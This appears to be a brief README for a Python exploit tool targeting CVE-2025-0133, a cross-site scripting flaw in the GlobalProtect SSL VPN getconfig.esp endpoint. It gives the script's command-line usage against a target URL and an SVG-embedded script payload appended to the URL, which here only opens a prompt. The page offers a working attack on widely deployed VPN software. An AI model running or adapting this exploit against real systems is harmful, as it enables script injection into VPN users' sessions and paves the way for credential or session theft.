
CVE-2025-0133 GlobalProtect XSS
🔓 Exploit for GlobalProtect SSL VPN endpoint /ssl-vpn/getconfig.esp that appends a crafted XSS payload to the URL.
python3 exploit.py -u https://target.com
-u, --url: Base target URL (do not include query params)<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>